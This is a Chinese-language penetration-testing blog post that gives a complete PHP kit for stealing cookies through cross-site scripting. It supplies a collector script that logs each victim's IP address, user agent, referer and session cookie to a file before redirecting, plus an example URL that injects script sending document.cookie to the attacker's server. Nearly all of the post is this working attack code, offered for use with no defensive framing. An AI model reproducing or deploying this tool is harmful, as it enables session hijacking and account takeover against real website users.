您的位置 » 首页 » 渗透测试 » 利用XSS窃取cookie的php脚本

利用XSS窃取cookie的php脚本

发表于5年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2012年06月18日 | 文章热度:4,492 次 全屏阅读

显示不全请点击全屏阅读

1.支持PHP 网页

 
2.网站存在xss的脆弱的地方。
 
 vb.php为存放cookie的网页
 
PHP Code:
<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther – Designed and programmed by R00t[ATI]</title>
</head>
 
<body bgcolor=”#C0C0C0″>
 
<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”> </p>
 
</body> 
 
documents.php取得cookie的网页
PHP Code:
    <?php
 
$ip = $_SERVER[‘REMOTE_ADDR’];
$referer = $_SERVER[‘HTTP_REFERER’];
$agent = $_SERVER[‘HTTP_USER_AGENT’];
 
$data = $_GET[c];
 
$time = date(“Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer:    “.$referer.”<br>Session: “.$data.”<br><br><br>”;
 
$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(“Location: http://ashker.Net”);
 
?>   
 
Vb.php文件是用来收集Cookie和其他信息。
 
documents.php文件用于抓取资料如: IP地址,用户代理和cookie 。
 
documents.php是抓住文件的Cookie使用的方法
 
documents.php?c=”+document.cookie;
 
如下例子
:
Code:
Code:
 
http://www.ashker.Net/vulnerable_page.php?vulnerable_method=<script>document.location=”http://ashker.net/documents.php?c=”+document.cookie;</script>

Tags:

XSS,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/289/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)